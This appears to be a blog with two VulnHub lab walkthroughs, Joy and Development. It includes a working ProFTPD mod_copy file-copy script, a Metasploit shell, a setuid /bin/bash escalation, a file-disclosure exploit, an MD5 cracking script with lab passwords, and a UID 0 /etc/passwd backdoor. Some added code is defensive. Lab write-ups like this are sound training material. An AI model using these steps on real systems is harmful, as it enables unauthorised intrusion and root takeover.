
Saturday, November 13, 2021

JOY

- Layout for this exercise:










1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Joy from the VulnHub pentesting platform.

Joy can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

- Once Joy has been downloaded and extracted with VMware:



2 - ENUMERATION

- netdiscover identifies Joy's IP address, 192.168.1.23:



- Scanning with Nmap:
















- A deeper scan of port 21 reveals an anonymous FTP server exposing two folders, download and upload:




























- download seems to be empty; upload, however, gives away a lot of information:




























- Connecting to the FTP server:










- Going to upload:



- Getting directory:







- Listing the directory, there are a lot of files inside:

















- However let's focus our attention on the file version_control:



- At this point the file cannot be retrieved directly, so we copy it into /upload, which is possible because that folder is readable and writable.

- Using the SITE CPFR and SITE CPTO commands (ProFTPD's mod_copy, which on this 1.3.5 server accepts them from an unauthenticated session) to copy version_control:

http://www.proftpd.org/docs/contrib/mod_copy.html














- Copying version_control to /upload has been successful:


































- Getting version_control:
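The copy-and-fetch sequence above (SITE CPFR, SITE CPTO, then a normal download), scripted with Python's ftplib. This is an added example, not code from the walkthrough: the source path of version_control and the server-side path behind the FTP "upload" folder are not shown on the page and are assumptions here, and FakeModCopyServer is a constructed offline stand-in for the ProFTPD session so the logic can be exercised without the VM.

```python
#!/usr/bin/env python3
"""Copy a file through ProFTPD mod_copy (SITE CPFR / SITE CPTO) and retrieve it.

Added example, not code from the Joy walkthrough. mod_copy answers CPFR with a 350
"ready for destination name" reply and CPTO with a 250 "Copy successful" reply; an
unpatched 1.3.5 accepts both from an anonymous session.
"""
import io
from ftplib import FTP, error_perm


def copy_commands(src: str, dst: str) -> list:
    """The two SITE commands mod_copy needs: select the source, then name the destination."""
    return [f"SITE CPFR {src}", f"SITE CPTO {dst}"]


def mod_copy_fetch(ftp, src: str, dst: str) -> bytes:
    """Copy src to dst server-side with mod_copy, then download dst.

    ftp is an ftplib.FTP (or any object with the same sendcmd/retrbinary methods).
    Raises RuntimeError if the server refuses either SITE command, so a patched or
    differently configured server fails loudly instead of returning a stale file.
    """
    expected = ("350", "250")
    for cmd, code in zip(copy_commands(src, dst), expected):
        try:
            reply = ftp.sendcmd(cmd)
        except error_perm as exc:          # e.g. "550 Access denied" or "500 unknown command"
            raise RuntimeError(f"{cmd!r} refused: {exc}") from exc
        if not reply.startswith(code):
            raise RuntimeError(f"{cmd!r} unexpected reply: {reply}")
    buf = io.BytesIO()
    ftp.retrbinary(f"RETR {dst}", buf.write)
    return buf.getvalue()


class FakeModCopyServer:
    """Constructed offline stand-in for a ProFTPD 1.3.5 session (not a real server)."""

    def __init__(self, files):
        self.files = dict(files)   # server-side path -> bytes
        self.pending = None        # source selected by the last CPFR
        self.log = []

    def sendcmd(self, cmd):
        self.log.append(cmd)
        verb, _, arg = cmd.partition(" ")
        sub, _, path = arg.partition(" ")
        if verb != "SITE" or sub.upper() not in ("CPFR", "CPTO"):
            raise error_perm("500 Unknown command")
        if sub.upper() == "CPFR":
            if path not in self.files:
                raise error_perm("550 No such file or directory")
            self.pending = path
            return "350 File or directory exists, ready for destination name"
        if self.pending is None:
            raise error_perm("503 Bad sequence of commands")
        self.files[path] = self.files[self.pending]
        self.pending = None
        return "250 Copy successful"

    def retrbinary(self, cmd, callback):
        path = cmd.split(" ", 1)[1]
        if path not in self.files:
            raise error_perm("550 Failed to open file")
        callback(self.files[path])
        return "226 Transfer complete"


if __name__ == "__main__":
    # Assumed paths: adjust the source location and the upload folder for the target.
    ftp = FTP("192.168.1.23", timeout=10)
    ftp.login()                          # anonymous login
    data = mod_copy_fetch(ftp, "/home/patrick/version_control", "/upload/version_control")
    print(data.decode(errors="replace"))
    ftp.quit()
```

Checking the reply codes rather than just sending the commands is the useful part: a server that has mod_copy disabled or restricted to authenticated users answers 500 or 550, and the script reports that instead of downloading whatever older copy may already sit in /upload.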








3 - EXPLOITATION

- Reading the file, we learn that the ProFTPD version is 1.3.5 (whose mod_copy accepts unauthenticated SITE CPFR/CPTO, the behaviour we already used) and that the webroot has been moved to /var/www/tryingharderisjoy:












- Searching for exploits in msfconsole:













- Setting the SITEPATH option to the new webroot /var/www/tryingharderisjoy (it must be the absolute filesystem path the web server serves, because the module uses mod_copy to drop a PHP file there and then requests it over HTTP):













- So finally we have a remote shell.


4 - PRIVILEGE ESCALATION

- Browsing around some content:


- Inside folder ossec we find essential credentials:






- Switching to root does not work:






- However, switching to patrick works, and this user has sudo privileges on the script test:











- Running test, we are asked for a file whose permissions should be changed; for instance, let's set /bin/bash to 4777, i.e. the SUID bit plus rwx for everyone:

https://www.slashroot.in/suid-and-sgid-linux-explained-examples



- Now patrick can run /bin/bash -p and get a root shell (bash needs -p to keep the effective UID; without it a setuid bash silently drops back to the caller's UID):
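The root of this escalation is a privileged helper that takes any path and any mode from the caller. The following is an added example, not Joy's test script (whose code the page does not show): a hardened stand-in that only allows plain rwx bits on files inside one directory tree, with the allowed tree /var/www/tryingharderisjoy as an assumed policy, and a demo() that exercises it on a throwaway directory without root.

```python
#!/usr/bin/env python3
"""Hardened stand-in for a sudo-allowed 'change permissions' helper.

Added example. Assumption: Joy's 'test' script takes a path and a mode from the caller and
passes them straight to chmod, which is what turns 'sudo test' into 'chmod 4777 /bin/bash'.
This version only allows plain rwx bits on files that live inside one directory tree.
"""
import os
import stat
import sys
import tempfile
from pathlib import Path

# Assumed policy: a web-admin helper should only touch files under the webroot.
ALLOWED_ROOT = Path("/var/www/tryingharderisjoy")


def parse_mode(text: str) -> int:
    """Parse an octal mode and refuse anything outside rwxrwxrwx.

    int('4777', 8) & ~0o777 == 0o4000 (setuid), so 4777 is rejected; the same test
    catches setgid (2000), the sticky bit (1000) and out-of-range values such as 77777.
    """
    try:
        mode = int(text, 8)
    except ValueError:
        raise ValueError(f"mode must be octal digits, got {text!r}") from None
    if mode < 0 or mode & ~0o777:
        raise ValueError(f"mode {text} sets special bits or is out of range")
    return mode


def resolve_target(path_str: str, root: Path = ALLOWED_ROOT) -> Path:
    """Follow symlinks and '..' first, then require the real file to sit under root."""
    target = Path(path_str).resolve(strict=True)   # strict=True: the file must exist
    root = root.resolve()
    if root not in target.parents:
        raise PermissionError(f"{target} is outside {root}")
    return target


def safe_chmod(path_str: str, mode_text: str, root: Path = ALLOWED_ROOT) -> int:
    """Validate both arguments, then chmod through a descriptor opened with O_NOFOLLOW.

    Opening first and calling fchmod on the descriptor means a symlink swapped in between
    the resolve() check and the chmod cannot redirect the change to /bin/bash.
    Returns the mode that was applied.
    """
    target = resolve_target(path_str, root)
    mode = parse_mode(mode_text)
    fd = os.open(target, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        os.fchmod(fd, mode)
    finally:
        os.close(fd)
    return mode


def has_special_bits(path_str: str) -> bool:
    """True if the file carries setuid/setgid/sticky: the state 'chmod 4777 /bin/bash' creates."""
    return bool(os.stat(path_str).st_mode & (stat.S_ISUID | stat.S_ISGID | stat.S_ISVTX))


def _attempt(path_str: str, mode_text: str, root: Path) -> str:
    """Return 'allowed' or the name of the exception the helper raised."""
    try:
        safe_chmod(path_str, mode_text, root=root)
        return "allowed"
    except (ValueError, PermissionError) as exc:
        return type(exc).__name__


def demo() -> dict:
    """Exercise the helper on constructed temp files and return what happened (no root needed)."""
    root = Path(tempfile.mkdtemp())
    page = root / "index.php"
    page.write_text("<?php echo 'constructed sample'; ?>\n")
    outside = Path(tempfile.mkdtemp()) / "bash"      # stands in for /bin/bash
    outside.write_text("")
    return {
        "applied": safe_chmod(str(page), "640", root=root),
        "actual": stat.S_IMODE(page.stat().st_mode),
        "special_after": has_special_bits(str(page)),
        "outside_tree": _attempt(str(outside), "755", root),   # path check fires
        "suid_mode": _attempt(str(page), "4777", root),        # mode check fires
    }


if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(oct(safe_chmod(sys.argv[1], sys.argv[2])))
    else:
        print(demo())
```

Two points matter beyond the validation itself: the helper must be owned by root and not writable by the sudoer (otherwise the checks are simply edited out), and the mode check has to be on the parsed value, not on the string, so that 04777, 4777 and 0o4777 are all caught.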







5 - CAPTURING THE FLAG

- Reading proof.txt:












Friday, November 12, 2021

DEVELOPMENT

- Layout for this exercise:














1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Development from the VulnHub pentesting platform.

- Development can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-development,280/

- Once Development has been downloaded and extracted with VMware:

















2 - ENUMERATION

- netdiscover identifies Development's IP address, 192.168.1.21:



















- This machine seems to have several possible solutions; however, I will stick to the path I used to solve it, based mainly on the web server on port 8080 and the SSH service on port 22.

- Scanning with Nmap:

















- Scanning deeper port 8080:










































- Connecting to the web server on port 8080 we learn about html_pages:























- Browsing html_pages shows a directory listing:






















- Most of those pages are just distractions; development.html, however, holds interesting information:






























- Viewing the source, /developmentsecretpage seems to be the path to follow:
























- Connecting to /developmentsecretpage:


















- Clicking Patrick's:
































- Clicking "Click here to log out" leads to a login form:

















3 - EXPLOITATION

- The login accepts any credentials, for instance abcde:abcde:



















- The page shows a PHP error message about a deprecated function; the file it names, slogin_lib.inc.php, points to the vulnerable login library:





































- Searching for a related exploit we find this File Disclosure / Remote File Inclusion advisory:



























- Running the exploit (the file-disclosure part) we obtain credentials for 4 users:













- Cracking the hashes (they are unsalted MD5, so this is a lookup, not decryption):



































- So the recovered credentials are:

intern:12345678900987654321
patrick:P@ssw0rd25
qiu:qiu
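The cracking step above as a script, an added example rather than the walkthrough's tooling. It assumes the disclosed users file holds one user:md5hex entry per line; the sample file and the mini wordlist are constructed here (the hashes are computed from the passwords recovered above, plus one account that is deliberately not crackable with the list), and the point it demonstrates is why unsalted hashes make this cheap: one MD5 per candidate word, reused for every user.

```python
#!/usr/bin/env python3
"""Crack unsalted MD5 password hashes from a 'user:hash' text file with a wordlist.

Added example, not the walkthrough's tooling. Assumption: the disclosed users file holds
one 'user:md5hex' entry per line. Because the hashes are unsalted, one MD5 per candidate
word is computed once and reused for every user: cracking is a table lookup.
"""
import hashlib
import re

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def md5hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


# Constructed sample: hashes derived here from the walkthrough's recovered passwords, plus one
# account whose password is not in the wordlist, and a malformed line the parser must skip.
SAMPLE_USERS = "\n".join([
    f"intern:{md5hex('12345678900987654321')}",
    f"patrick:{md5hex('P@ssw0rd25')}",
    f"qiu:{md5hex('qiu')}",
    f"admin:{md5hex('not-in-any-wordlist-0x5f3759df')}",
    "# comment line without a hash",
])

# Constructed mini wordlist; in practice this is rockyou.txt or similar.
WORDLIST = ["123456", "password", "qiu", "admin", "P@ssw0rd25", "12345678900987654321"]


def parse_users(text: str) -> dict:
    """Return {user: hash} for well-formed lines; anything without a 32-hex-digit hash is ignored."""
    users = {}
    for line in text.splitlines():
        user, sep, h = line.strip().partition(":")
        h = h.strip().lower()
        if sep and user and HEX32.match(h):
            users[user.strip()] = h
    return users


def crack(users: dict, wordlist) -> dict:
    """Map each user to its plaintext, or None when no candidate matches.

    Building the table once is the salt-free shortcut: with per-user salts every
    candidate would have to be hashed again for every user.
    """
    table = {}
    for word in wordlist:
        table.setdefault(md5hex(word), word)
    return {user: table.get(h) for user, h in users.items()}


if __name__ == "__main__":
    for user, plain in crack(parse_users(SAMPLE_USERS), WORDLIST).items():
        print(f"{user}: {plain if plain is not None else '<not cracked>'}")
```

The same parse-then-lookup shape works against any flat-file credential store that keeps unsalted digests; swapping md5hex for a SHA-1 or SHA-256 helper is the only change.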


- After trying SSH unsuccessfully with patrick and qiu, the only account that works is intern:








































- However, the shell is restricted: only a few commands are allowed:













- Following these instructions we can escape lshell and get rid of its limitations:








4 - CAPTURING THE 1st FLAG

- Reading local.txt:








5 - PRIVILEGE ESCALATION

- User intern has no sudo privileges:







- However, user patrick's sudo privileges allow him to run editors like vim and nano as root:



















- The strategy for privilege escalation will be to edit /etc/passwd, adding a line for a new user with UID 0 whose password hash sits directly in the second field (when that field is not 'x', the hash there is used and /etc/shadow is never consulted for the account).

- First, let's create the hash for the new user whitelist:qwerty (for instance with openssl passwd -1 qwerty):







- Using sudo with the editor, we insert the corresponding line at the bottom of /etc/passwd:





- Finally, switching to user whitelist (su whitelist) gives a root shell:
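Both sides of this escalation in one added example (not code from the walkthrough): backdoor_line() builds the passwd entry the procedure above appends, and audit_passwd() is the check a defender runs to spot it, flagging any UID 0 account other than root and any password field that holds a hash instead of 'x'. The sample passwd file and the hash string are constructed placeholders; on a real box the hash comes from openssl passwd as described above.

```python
#!/usr/bin/env python3
"""Build and detect a UID-0 backdoor line in /etc/passwd.

Added example, not code from the walkthrough. The line an attacker appends has two
tells: a UID of 0 on an account that is not root, and a password hash sitting in the
second field instead of 'x' (then that hash is used and /etc/shadow is never consulted).
"""

# Constructed placeholder standing in for the output of 'openssl passwd -1 qwerty'.
CONSTRUCTED_HASH = "$1$saltsalt$constructedplaceholderhash"

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def backdoor_line(user: str, pw_hash: str) -> str:
    """The entry the privilege escalation appends: UID 0, GID 0, root's home and shell."""
    return f"{user}:{pw_hash}:0:0:root:/root:/bin/bash"


def parse_passwd(text: str) -> list:
    """Parse passwd lines into dicts; blank lines are skipped, bad field counts are marked."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            entries.append({"line": n, "name": line, "malformed": True})
            continue
        entry = dict(zip(PASSWD_FIELDS, parts))
        entry["line"] = n
        entry["malformed"] = False
        entries.append(entry)
    return entries


def audit_passwd(text: str) -> list:
    """Return (line, account, reason) findings for each suspicious entry."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["name"], "malformed entry"))
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], e["name"], "UID 0 account other than root"))
        pw = e["passwd"]
        if pw == "":
            findings.append((e["line"], e["name"], "empty password field (no password required)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # 'x' defers to /etc/shadow; '*' and '!...' are locked. Anything else is a live hash.
            findings.append((e["line"], e["name"], "password hash stored in /etc/passwd, bypasses /etc/shadow"))
    return findings


# Constructed sample: a Debian-style head of /etc/passwd plus the appended backdoor.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "intern:x:1000:1000:intern:/home/intern:/usr/bin/lshell",
    "patrick:x:1001:1001:patrick:/home/patrick:/bin/bash",
    backdoor_line("whitelist", CONSTRUCTED_HASH),
])


if __name__ == "__main__":
    for line, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {name}: {reason}")
```

The audit reads the file as text rather than going through pwd.getpwall() on purpose: the library call answers for the whole NSS stack, whereas the tampered line lives in the file, and the line number is what you want when you go to remove it.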









6 - CAPTURING THE 2nd FLAG

- Reading proof.txt: